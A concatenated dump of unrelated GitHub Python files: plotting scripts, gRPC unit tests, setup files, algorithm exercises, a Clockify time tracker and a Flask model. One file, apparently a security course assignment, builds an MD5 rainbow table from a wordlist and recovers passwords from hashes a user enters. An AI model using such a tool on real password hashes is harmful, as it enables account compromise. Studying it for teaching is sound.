plt.show()\n","repo_name":"MauroLuzzatto/Q-Learning-Demo-Play-nChain","sub_path":"helper_functions/visualize_plays.py","file_name":"visualize_plays.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"2556350229","text":"# user=int(input(\"enter the number :\"))\n# a=2\n# count=0\n# while a>0:\n# b=2\n# while b<a:\n# if a%b==0:\n# break\n# b+=1\n# else:\n# if count==user:\n# print(a)\n# break\n# count+=1\n# a+=1\n\n\n\nuser=input(\"enter sentence\")\nb=user.split()\ni=0\ns=\"\"\nwhile i<len(b):\n if b[i]==b[0]:\n s=s+b[i][0]\n else:\n s=s+\".\"+b[i]\n i=i+1\nprint(s)\n\n\n ","repo_name":"Sindhu983/logic_Q","sub_path":"prime_pstn.py","file_name":"prime_pstn.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34766192245","text":"\nimport pytest\n\nfrom synse_grpc import api, utils\n\n\n@pytest.mark.parametrize('message,expected', [\n (\n api.V3Tag(\n namespace='vapor',\n label='foo',\n ),\n {\n 'namespace': 'vapor',\n 'annotation': '',\n 'label': 'foo',\n },\n ),\n (\n api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n ),\n (\n api.V3Reading(\n id='123',\n string_value='foo',\n type='test',\n unit=api.V3OutputUnit(\n name='test',\n symbol='T',\n ),\n ),\n {\n 'id': '123',\n 'timestamp': '',\n 'type': 'test',\n 'device_type': '',\n 'device_info': '',\n 'string_value': 'foo',\n 'unit': {\n 'name': 'test',\n 'symbol': 'T',\n },\n 'context': {},\n },\n ),\n (\n api.V3TransactionStatus(\n id='123',\n timeout='5s',\n status=api.DONE,\n ),\n {\n 'id': '123',\n 'created': '',\n 'updated': '',\n 'message': '',\n 'timeout': '5s',\n 'status': 'DONE',\n },\n ),\n (\n api.V3TransactionStatus(\n id='123',\n timeout='5s',\n status=api.DONE,\n context=api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n ),\n {\n 'id': '123',\n 'created': '',\n 'updated': '',\n 'message': '',\n 'timeout': '5s',\n 'status': 'DONE',\n 'context': {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n },\n ),\n (\n api.V3WriteTransaction(\n id='123',\n device='foo',\n timeout='5s',\n ),\n {\n 'id': '123',\n 'device': 'foo',\n 'timeout': '5s',\n },\n ),\n (\n api.V3WriteTransaction(\n id='123',\n device='foo',\n timeout='5s',\n context=api.V3WriteData(\n action='foo',\n data=b'bar',\n ),\n ),\n {\n 'id': '123',\n 'device': 'foo',\n 'timeout': '5s',\n 'context': {\n 'action': 'foo',\n 'data': b'bar',\n 'transaction': '',\n },\n },\n ),\n (\n api.V3WritePayload(\n selector=api.V3DeviceSelector(\n id='123',\n ),\n ),\n {\n 'selector': {\n 'id': '123',\n 'tags': [],\n },\n 'data': [],\n },\n ),\n (\n api.V3WritePayload(\n selector=api.V3DeviceSelector(\n id='123',\n ),\n data=[\n api.V3WriteData(\n action='foo1',\n data=b'bar1',\n ),\n api.V3WriteData(\n action='foo2',\n data=b'bar2',\n ),\n ],\n ),\n {\n 'selector': {\n 'id': '123',\n 'tags': [],\n },\n 'data': [\n {\n 'action': 'foo1',\n 'data': b'bar1',\n 'transaction': '',\n },\n {\n 'action': 'foo2',\n 'data': b'bar2',\n 'transaction': '',\n },\n ],\n },\n ),\n])\ndef test_to_dict(message, expected):\n \"\"\"Convert gRPC messages to their dictionary representations.\"\"\"\n\n assert utils.to_dict(message) == expected\n\n\n@pytest.mark.parametrize('tag,message', [\n ('vapor/foo:bar', api.V3Tag(namespace='vapor', annotation='foo', label='bar')),\n ('foo:bar', api.V3Tag(annotation='foo', label='bar')),\n ('vapor/bar', api.V3Tag(namespace='vapor', label='bar')),\n ('bar', api.V3Tag(label='bar')),\n ('', api.V3Tag()),\n])\ndef test_tag_to_message(tag, message):\n \"\"\"Convert a tag string to the V3Tag message.\"\"\"\n\n assert utils.tag_to_message(tag) == message\n\n\n@pytest.mark.parametrize('tag,string', [\n (api.V3Tag(), ''),\n (api.V3Tag(label='foo'), 'foo'),\n (api.V3Tag(namespace='vapor', label='foo'), 'vapor/foo'),\n (api.V3Tag(namespace='vapor', annotation='bar', label='foo'), 'vapor/bar:foo'),\n (api.V3Tag(annotation='bar', label='foo'), 'bar:foo'),\n])\ndef test_tag_string(tag, string):\n \"\"\"Convert a V3Tag to its corresponding tag string.\"\"\"\n\n assert utils.tag_string(tag) == string\n\n\n@pytest.mark.parametrize('data,messages', [\n (\n {},\n [api.V3WriteData()]\n ),\n (\n [{}],\n [api.V3WriteData()]\n ),\n (\n {'action': 'foo'},\n [api.V3WriteData(action='foo')]\n ),\n (\n {'action': 'foo', 'data': 'bar'},\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n {'action': 'foo', 'data': b'bar'},\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n {'action': 'foo', 'data': b'bar', 'transaction': '123'},\n [api.V3WriteData(action='foo', data=b'bar', transaction='123')]\n ),\n (\n {'action': 'foo', 'transaction': '123'},\n [api.V3WriteData(action='foo', transaction='123')]\n ),\n (\n [{'action': 'foo'}],\n [api.V3WriteData(action='foo')]\n ),\n (\n [{'action': 'foo', 'data': b'bar'}],\n [api.V3WriteData(action='foo', data=b'bar')]\n ),\n (\n [{'action': 'foo', 'data': b'bar', 'transaction': '123'}],\n [api.V3WriteData(action='foo', data=b'bar', transaction='123')]\n ),\n (\n [{'action': 'foo', 'transaction': '123'}],\n [api.V3WriteData(action='foo', transaction='123')]\n ),\n (\n [\n {'action': 'foo'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo'),\n api.V3WriteData(action='abc'),\n ]\n ),\n (\n [\n {'action': 'foo', 'data': b'bar'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo', data=b'bar'),\n api.V3WriteData(action='abc'),\n ]\n ),\n (\n [\n {'action': 'foo', 'data': b'bar', 'transaction': '123'},\n {'action': 'abc'}\n ],\n [\n api.V3WriteData(action='foo', data=b'bar', transaction='123'),\n api.V3WriteData(action='abc'),\n ]\n ),\n\n])\ndef test_write_data_to_message(data, messages):\n \"\"\"Convert some write data to a V3WriteData message.\"\"\"\n\n assert utils.write_data_to_messages(data) == messages\n\n\n@pytest.mark.parametrize('status,name', [\n (0, 'pending'),\n (1, 'writing'),\n (3, 'done'),\n (4, 'error'),\n])\ndef test_write_status_name(status, name):\n \"\"\"Get the name for the write status value.\"\"\"\n\n assert utils.write_status_name(status) == name\n\n\ndef test_write_status_name_error():\n \"\"\"Get the name for an invalid write status value.\"\"\"\n\n with pytest.raises(ValueError):\n utils.write_status_name(-1)\n\n\n@pytest.mark.parametrize('status,name', [\n (0, 'unknown'),\n (1, 'ok'),\n (2, 'failing'),\n])\ndef test_health_status_name(status, name):\n \"\"\"Get the name for the health status value.\"\"\"\n\n assert utils.health_status_name(status) == name\n\n\ndef test_health_status_name_error():\n \"\"\"Get the name for an invalid health status value.\"\"\"\n\n with pytest.raises(ValueError):\n utils.health_status_name(-1)\n","repo_name":"vapor-ware/synse-server-grpc","sub_path":"python/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":7817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39330632758","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"onedice\",\n version=\"1.0.7\",\n author=\"lunzhiPenxil\",\n author_email=\"lunzhiPenxil@gmail.com\",\n description=\"OneDice offical standard library for Python\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/OlivOS-Team/lib-onedice\",\n packages=setuptools.find_packages(),\n install_requires=[],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n \"Operating System :: OS Independent\",\n ],\n)","repo_name":"OlivOS-Team/lib-onedice","sub_path":"python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"128477091","text":"# Solved on 2022. 3. 5.\n# 5397 키로거\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nT = int(input())\nfor _ in range(T):\n String = input().strip()\n left, right = [], deque()\n for ch in String:\n if ch == '<':\n if left:\n right.appendleft(left.pop())\n elif ch == '>':\n if right:\n left.append(right.popleft())\n elif ch == '-':\n if left:\n left.pop()\n else:\n left.append(ch)\n print(''.join(left) + ''.join(right))\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/Data_Structure/5397.py","file_name":"5397.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2499039687","text":"import argparse\nfrom seqeval.metrics import classification_report\nfrom seqeval.metrics import accuracy_score\n\nfrom collections import defaultdict # available in Python 2.5 and newer\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\n\n\ndef read_conllu(file, column):\n fin = open(file)\n sentences = []\n sentence = []\n for line in fin:\n if line.startswith('#'):\n continue\n if line is None or line == '\\n':\n sentences.append(sentence)\n sentence = []\n else:\n columns = line.rstrip().split('\\t')\n if not '.' in columns[0]:\n sentence.append(line.rstrip().split('\\t')[column])\n if len(sentence) > 0:\n sentences.append(sentence)\n return sentences\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--gold_file\", type=str)\nparser.add_argument(\"--pred_file\", type=str)\nparser.add_argument(\"--out_plot\", type=str)\nparser.add_argument(\"--column\", type=int, default=5)\nargs = parser.parse_args()\n\ny_true = read_conllu(args.gold_file, args.column)\ny_pred = read_conllu(args.pred_file, args.column)\n\nflat_y_true = [item for sublist in y_true for item in sublist]\nflat_y_pred = [item for sublist in y_pred for item in sublist]\n\nassert len(flat_y_true) == len(flat_y_pred)\n\nprint(classification_report(y_true, y_pred, digits=4))\nprint(accuracy_score(y_true, y_pred))\n\n# Creates a confusion matrix\nlabel_count = defaultdict(int)\nfor label in flat_y_true:\n label_count[label] += 1\n\nlabels = []\nfor l,c in label_count.items():\n if c > 20:\n labels.append(l)\n\ncm = confusion_matrix(flat_y_true, flat_y_pred, labels=labels)\ncm_df = pd.DataFrame(cm, index=labels, columns=labels)\n\nplt.figure(figsize=(50, 50))\nsns.heatmap(cm_df, annot=True, cmap=\"YlGnBu\")\nplt.ylabel('True label')\nplt.xlabel('Predicted label')\nplt.savefig(args.out_plot, bbox_inches='tight')\nplt.close()\n\n","repo_name":"ahmetustun/udapter","sub_path":"scripts/seq_eval.py","file_name":"seq_eval.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"16"} +{"seq_id":"5495328374","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Dec 10 16:28:05 2021\n\n@author: lexipfalzgraf\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nHegelFreq=pd.read_csv('hegelFreq.csv')\nMacyFreq=pd.read_csv('macyFreq.csv')\nMontFreq=pd.read_csv('montFreq.csv')\nWebFreq=pd.read_csv('webFreq.csv')\nWilsonFreq=pd.read_csv('WilsonFreq.csv')\n\n\nplt.rcParams['font.sans-serif'] = \"Times New Roman\"\nplt.rcParams['font.family'] = \"sans-serif\"\nplt.locator_params(axis=\"x\", nbins=13)\nplt.locator_params(axis=\"y\", nbins=6)\nplt.xlabel(\"Year\", loc='center')\nplt.ylabel(\"Frequency of Usage by Author\", loc='center')\nplt.xticks(fontsize=10)\nplt.yticks(fontsize=10)\nplt.ylim(top=25) \nplt.ylim(bottom=0)\n\nMacyFreq['Rolling'] = MacyFreq['Frequence'].rolling(5).mean()\nMontFreq['Rolling'] = MontFreq['Frequence'].rolling(5).mean()\nWebFreq['Rolling'] = WebFreq['Frequence'].rolling(5).mean()\nWilsonFreq['Rolling'] = WilsonFreq['Frequence'].rolling(5).mean()\nHegelFreq['Rolling'] = HegelFreq['Frequence'].rolling(5).mean()\n\nHegelFreq['Rolling']= 100*HegelFreq['Rolling']\nMacyFreq['Rolling']= 100*MacyFreq['Rolling']\nMontFreq['Rolling']= 100*MontFreq['Rolling']\nWebFreq['Rolling']= 100*WebFreq['Rolling']\nWilsonFreq['Rolling']= 100*WilsonFreq['Rolling']\n\nplt.plot(HegelFreq['Year'], HegelFreq['Rolling'], label = \"Hegel\", color=\"gainsboro\",linewidth=1, linestyle=\"dashed\")\nplt.plot(MacyFreq['Year'], MacyFreq['Rolling'], label = \"Macy\", color=\"darkgrey\",linewidth=1, linestyle=\"dotted\")\nplt.plot(MontFreq['Year'], MontFreq['Rolling'], label = \"Montesquieu\", color=\"dimgrey\",linewidth=1, linestyle=\"dashdot\")\nplt.plot(WebFreq['Year'], WebFreq['Rolling'], label = \"Weber\", color=\"black\",linewidth=1, linestyle=\"solid\")\nplt.plot(WilsonFreq['Year'], WilsonFreq['Rolling'], label = \"Wilson\", color=\"lightgrey\",linewidth=1, linestyle=\"solid\")\n\n\nplt.legend(loc=1, prop={'size': 7})\n\n#plt.savefig(\"freqAuthors.png\",dpi=200, bbox_inches=\"tight\")\nplt.show()\n\n","repo_name":"lpfalz/SpiritData","sub_path":"frequencePlot.py","file_name":"frequencePlot.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18092751800","text":"import hashlib\r\nfrom os import read\r\nimport re\r\n\r\npwdListLength = 1\r\nrainbowTable = []\r\n\r\n# Read in list of possible pwds + print no. of pwds processed\r\ndef processFile():\r\n global pwdListLength\r\n txtFile = open(\"Wordlist.txt\")\r\n list = []\r\n for word in txtFile:\r\n #remove '/n' from readIn and append to list\r\n list.append([word.strip('\\n'),False])\r\n print(\"No. of words read from file:\",len(list))\r\n pwdListLength = len(list)\r\n return list\r\n\r\n# Reduction Function\r\ndef reductionFunc(reduced):\r\n global pwdListLength\r\n reduced = re.sub(r'[a-zA-Z]',\"\",reduced) # remove all alphabetic char\r\n reduced = (int(reduced) * (pwdListLength % 32)) # modulo by length of passwordList \r\n reduced = str(reduced) # convert back to str\r\n return str(reduced[:6]) # return first six digits\r\n\r\n# Hash Function\r\ndef hashFunc(hashed):\r\n #encode var to bytes\r\n enc = bytes(hashed, encoding='utf-8')\r\n enc = hashlib.md5(enc)\r\n return (enc.hexdigest())\r\n\r\n# Reduce and Hash Function\r\ndef redHashFunc(finalValue):\r\n finalValue = reductionFunc(finalValue)\r\n return hashFunc(finalValue)\r\n\r\n# generate rainbowTable into txt file\r\ndef tableGenerator(rainbowTable):\r\n txtFile = open('Rainbowtable.txt','w')\r\n for i in rainbowTable:\r\n txtFile.write(\"%s %s \\n\" % (i[0],i[1]))\r\n txtFile.close\r\n print(\"Rainbowtable.txt consists of %s lines.\"%(len(rainbowTable)))\r\n\r\npasswordList = processFile()\r\n\r\nfor word in passwordList:\r\n word[1] = True\r\n pw = word[0]\r\n pw = hashFunc(pw)\r\n for i in range(5):\r\n pw = redHashFunc(pw)\r\n rainbowTable.append([word[0],pw])\r\n\r\n#sort table by hash values.\r\nrainbowTable = sorted(rainbowTable, key=lambda x:x[1]) \r\ntableGenerator(rainbowTable)\r\n\r\n# SECOND STEP\r\n# check if hash value exists in table\r\ndef checkHash(hash):\r\n for value in rainbowTable:\r\n if hash == value[1]:\r\n return (True,value)\r\n return (False,None)\r\n\r\ndef findHash(hash):\r\n count = 0\r\n while (count < 10000):\r\n hash = reductionFunc(hash)\r\n hash = hashFunc(hash)\r\n count += 1\r\n result = checkHash(hash)\r\n if (result[0]): \r\n #return word if found\r\n return result[1][0]\r\n print(\"Unable to identify hash\")\r\n exit()\r\n\r\n# function to check if word matches hash value\r\ndef checkWordHash(word,hash):\r\n count = 0\r\n word = hashFunc(word)\r\n while((word!=hash)):\r\n word = redHashFunc(word)\r\n count += 1\r\n if count>10000:\r\n print (\"Unable to match word to hash value\")\r\n exit()\r\n return True\r\n\r\n# user input\r\nhash_input=''\r\n\r\nwhile(True):\r\n print(\"\\nPlease enter hash value\")\r\n hash_input = input()\r\n if(len(hash_input) == 32): # check that hash value length is 32\r\n break\r\n else:\r\n print('Hash Value does not exist!')\r\n\r\nresult = checkHash(hash_input)\r\n\r\nif(result[0]):\r\n if(checkWordHash ( result[1][0], hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" found! The word is\",result[1][0])\r\nelse:\r\n word = findHash(hash_input)\r\n if(checkWordHash ( word, hash_input ) ):\r\n print(\"Pre-image of \",hash_input,\" The word is\", word)","repo_name":"kikoken831/CSIT622","sub_path":"old/Assignment 1/rainbowTable.py","file_name":"rainbowTable.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"70044476490","text":"# ToDo: Don't stretch line for over-spent time\n# Normal time input\n# Overall time on the title of figure\n\nimport argparse\nimport yaml\nimport re\nimport math\nimport pandas as pd\nfrom datetime import datetime\nfrom dateutil import parser\nfrom clockify import factories\nfrom clockify_api_client.client import ClockifyAPIClient\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef match(done_project, done_task, target_task):\n target_task = str(target_task).strip().lower()\n if target_task.startswith('project:'):\n target_project = target_task[8:].strip()\n done_project = str(done_project).lower()\n return done_project == target_project\n elif target_task.startswith('task:'):\n target_desc = target_task[5:].strip()\n done_task = str(done_task).lower()\n return target_desc in done_task\n else:\n raise 'Unknown task description!'\n\n\ndef read_clockify(config):\n api_key = config['clockify']['api_key']\n workspace_name = config['clockify']['workspace_name']\n user_name = config['clockify']['user_name']\n\n workspace_id = None\n for workspace in factories.Workspace(api_key=api_key).get_all_workspaces():\n if (workspace['name'] == workspace_name) or (workspace_name == ''):\n workspace_id = workspace['id']\n if workspace_id is None:\n raise ValueError(f'workspace {workspace_name} not found!')\n\n user_id = None\n for user in factories.User(api_key=api_key).get_all_workspace_users(workspace_id=workspace_id):\n if (user['name'] == user_name) or (user_name == ''):\n user_id = user['id']\n if user_id is None:\n raise ValueError(f'user {user_name} not found!')\n\n client = ClockifyAPIClient().build(api_key, 'api.clockify.me/v1')\n projects = dict()\n for project in client.projects.get_projects(workspace_id):\n if not project['archived']:\n projects[project['id']] = project['name']\n\n entries = factories.TimeEntry(api_key=api_key).get_all_time_entry_user(workspace_id=workspace_id,\n user_id=user_id)\n return workspace_id, user_id, projects, entries\n\n\ndef process_entry(done, projects, task=None):\n elapsed = 0\n duration = done['timeInterval']['duration']\n if duration is None: # When clockify is running\n return 0\n r = re.match(r\"PT(\\d*H)?(\\d*M)?(\\d*S)?\", duration)\n if r.group(1):\n elapsed += int(r.group(1)[:-1])\n if r.group(2):\n elapsed += int(r.group(2)[:-1]) / 60\n if r.group(3):\n elapsed += int(r.group(3)[:-1]) / 3600\n\n if (task is None) or match(projects[done['projectId']], done['description'], task['Description']):\n return elapsed\n return 0\n\n\ndef process_entries(config, entries, projects):\n tasks_path = config['tasks']['file_path']\n sheet_name = config['tasks']['sheet_name']\n start_of_sprint = config['sprint']['start_of_sprint']\n end_of_sprint = start_of_sprint + len(config['sprint']['sprint_days']) * 86400\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n\n # Read tasks and sort to place tasks above projects\n # (to avoid double calculation of clockify entries which match both a project and a task)\n tasks = pd.read_excel(tasks_path, sheet_name=sheet_name).sort_values('Description', ascending=False).reset_index(\n drop=True)\n total_scheduled_hours = sum(tasks['Estimated Hours'])\n\n # Process time entries\n results = [[0.0, float(d['Estimated Hours']), d['Description']] for i, d in\n tasks.iterrows()] # (spend_hours, estimated_hours)\n\n processed_ids = [] # get_all_time_entry_user returns each entry multiple times, so we need to check them.\n off_schedule_spent = 0\n for entry in entries:\n date = parser.parse(entry['timeInterval']['start']).timestamp()\n if (start_of_sprint <= date < end_of_sprint) and (entry['id'] not in processed_ids):\n entry_matched = False\n processed_ids.append(entry['id'])\n for i, t in tasks.iterrows():\n elapsed_time = process_entry(done=entry, projects=projects, task=t)\n results[i][0] += elapsed_time\n if elapsed_time > 0:\n entry_matched = True\n break\n if not entry_matched:\n off_schedule_spent += process_entry(done=entry, projects=projects)\n\n results.append([off_schedule_spent, total_sprint_time - total_scheduled_hours, 'Off-scheduled'])\n return results, total_scheduled_hours\n\n\ndef plot_results(config, results, total_scheduled_hours):\n total_sprint_time = sum(config['sprint']['sprint_days']) * config['sprint']['day_time']\n start_of_sprint = config['sprint']['start_of_sprint']\n sprint_days = config['sprint']['sprint_days']\n\n df = []\n for r in results:\n df.append(['Spent', r[0] / r[1], r[0], r[2]])\n df.append(['Estimated', 1, r[1], r[2]])\n df = pd.DataFrame(df, columns=['Type', 'Hours-Rate', 'Hours-Val', 'Task'])\n\n sns.set(rc={'figure.figsize': (14, 6)}, font_scale=1)\n g = sns.barplot(x=\"Hours-Rate\", y=\"Task\",\n hue=\"Type\", data=df, palette='copper')\n g.legend_ = None\n g.set(xticklabels=[])\n g.set(xlabel='Hours')\n total_spent_scheduled_hours = sum(\n [min(r[0], r[1]) for r in results[:-1]]) # Just scheduled tasks. Times spent more than scheduled not considered\n total_spent_hours = sum([r[0] for r in results])\n\n # Compute expected progress\n passed_full_days = math.floor((datetime.now().timestamp() - start_of_sprint) / 86400)\n working_full_days = sum(sprint_days[:passed_full_days])\n if passed_full_days < len(sprint_days):\n today_expected_progress = (datetime.now().timestamp() - (start_of_sprint + passed_full_days * 86400)) * sprint_days[passed_full_days]\n else:\n today_expected_progress = 0\n expected_progress = (working_full_days * 86400 + today_expected_progress) / (sum(sprint_days)*86400) * 100\n\n g.set(title=f\"Tasks achievement: {total_spent_scheduled_hours / total_scheduled_hours * 100:.1f}% - \" +\n f\"Total time: {total_spent_hours / total_sprint_time * 100:.1f}% - \" +\n f\"Expected: {expected_progress:.1f}%\")\n\n for i, container in enumerate(g.containers):\n if i == 0: # spent\n g.bar_label(container, [f\"{r[0] / r[1] * 100:.1f}%\" for r in results])\n else: # estimated\n g.bar_label(container, [f\"{r[1]:.2f}\" for r in results])\n plt.subplots_adjust(left=0.25)\n plt.show()\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', type=argparse.FileType('r'),\n default='config.yml', help='config file for %(prog)s')\n args = parser.parse_args()\n config = yaml.load(args.config.read(), Loader=yaml.SafeLoader)\n\n try:\n workspace_id, user_id, projects, entries = read_clockify(config=config)\n results, total_scheduled_hours = process_entries(config=config,\n entries=entries,\n projects=projects)\n plot_results(config=config,\n results=results,\n total_scheduled_hours=total_scheduled_hours)\n except ValueError as err:\n print(err.args)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"h-amirkhani/clockify-scrum","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"24702619797","text":"from torch import nn\nfrom torch.nn import TransformerEncoder, TransformerEncoderLayer, Parameter, Linear, Module, ReLU, GELU\n\n\nclass TransformerBlock(Module):\n def __init__(self, d_model, nhead, dff, activation, num_layers):\n super().__init__()\n assert activation in ['relu', 'gelu']\n if activation == 'relu':\n self.activation = ReLU(inplace=True)\n elif activation == 'gelu':\n self.activation = GELU()\n self.transformer_block = TransformerEncoder(\n TransformerEncoderLayer(d_model=d_model, nhead=nhead, dim_feedforward=dff, activation=activation,\n batch_first=True, dropout=0.), num_layers=num_layers)\n\n def forward(self, x):\n return self.transformer_block(x)\n","repo_name":"caihao/SWD-EvtGen","sub_path":"src/models/backbone.py","file_name":"backbone.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"6469939681","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 16 12:03:23 2019\n\n@author: zhangzhaopeng\n\"\"\"\n\n## binary search tree\n\nclass TreeNode():\n \n def __init__(self, value):\n self.val = value\n self.left = None\n self.right = None\n\nclass binary_search_tree():\n \n def __init__(self):\n \n self.root = None\n \n# def insert(self, val):\n# \n# s = TreeNode(val)\n# if self.root == None:\n# self.root = s\n# else:\n# if s.val < self.root.val:\n# self.insert(root.left, s)\n# else:\n# self.insert(root.right, s)\n \n def insert(self, val):\n \n node = TreeNode(val)\n if self.root == None:\n self.root = node\n else:\n cur = self.root\n if val < cur.val:\n if cur.left == None:\n cur.left = node\n else:\n if cur.right == None:\n cur.right = node\n \n\n# def insert(self, value: int):\n# if not self.root:\n# self.root = TreeNode(value)\n# return\n# parent = None\n# node = self.root\n# while node:\n# parent = node\n# node = node.left if node.val > value else node.right\n# new_node = TreeNode(value)\n# if parent.val > value:\n# parent.left = new_node\n# else:\n# parent.right = new_node\n \n def delete(self, val):\n \n node = self.root\n parent = None\n while node and node.val != val:\n parent = node\n node = node.left if node.val > val else node.right\n \n if not node:\n return \n \n if node.left == None and node.right == None:\n parent.left = None\n \n elif node.left == None:\n parent.left = node.right\n elif node.right == None:\n parent.left = node.left\n else:\n par = node\n s = node.right\n while s.left:\n par = s\n s = s.left\n node.val = s.val\n if par == node:\n par.right = s.right\n else:\n par.left = s.right\n \n def find(self, val):\n \n node = self.root\n while node and node.val != val:\n node = node.left if node.val > val else node.right\n return node\n\n\n# test\n\nt = binary_search_tree()\nt.insert(1)\nt.insert(2)\nt.insert(3)\n\nt.delete(3)\n\nt.find(1)\n\n\n\n\n","repo_name":"zhangzhp7/Algorithm","sub_path":"binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43627318467","text":"# 638/378\nfrom sys import stdin\nfrom re import compile\n\ndef parse_lines(lines):\n # hcl:#6b5442 ... -> [('hcl', '#6b5442'), ...]\n return [(typ, v) for line in map(lambda x: map(lambda x: x.split(':'), x.split(' ')), lines.split('\\n')) for typ, v in line]\n\ndata = list(map(parse_lines, stdin.read().strip().split('\\n\\n')))\n# Rules for A\nneeded = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']\n# Rules for B\nhgt, hcl, pid = compile('^(\\d+)(cm|in)$'), compile('^#[0-9a-f]{6}$'), compile('^\\d{9}$')\necl = ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']\n\ndef valid(typ, v):\n if typ == 'byr':\n return 1920 <= int(v) <= 2002\n if typ == 'iyr':\n return 2010 <= int(v) <= 2020\n if typ == 'eyr':\n return 2020 <= int(v) <= 2030\n if typ == 'hgt':\n matches = hgt.match(v)\n if matches is None:\n return False\n n, u = matches.groups()\n return 150 <= int(n) <= 193 if u == 'cm' else 59 <= int(n) <= 76\n if typ == 'hcl':\n return hcl.match(v) is not None\n if typ == 'ecl':\n return v in ecl\n if typ == 'pid':\n return pid.match(v) is not None\n return True\n\na, b = 0, 0\nfor pp in data:\n if all(n in [typ for typ, _ in pp] for n in needed):\n a += 1\n if all(valid(typ, v) for typ, v in pp):\n b += 1\n\nprint('a', a)\nprint('b', b)\n","repo_name":"stristr/aoc2020","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38375758085","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nfrom flask import flash \n\nclass Book_Author:\n def __init__(self,data):\n self.book_id = data['book_id']\n self.author_id = data['author_id']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n\n# ============================================= \n# INSERT : new book / author ids\n# ============================================= \n @classmethod\n def add_new_book_author(cls,data):\n query = \"INSERT INTO books_authors (book_id,author_id) VALUES (%(book_id)s, %(author_id)s);\"\n results = connectToMySQL('book_club').query_db(query,data)\n return results","repo_name":"bakerlisa/NightOwl","sub_path":"flask_app/models/book_author_model.py","file_name":"book_author_model.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9541884799","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='collective.mdlevent',\n version=version,\n description=\"Multi dates and locations event for Plone\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Plone\",\n \"Framework :: Plone :: 4.0\",\n \"Framework :: Plone :: 4.1\",\n \"Framework :: Plone :: 4.2\",\n ],\n keywords='',\n author='',\n author_email='',\n url='http://svn.plone.org/svn/collective/',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['collective'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.dexterity',\n 'five.grok',\n 'z3c.blobfile',\n # -*- Extra requirements: -*-\n ],\n extras_require = dict(\n tests=['plone.app.testing'],\n ),\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n 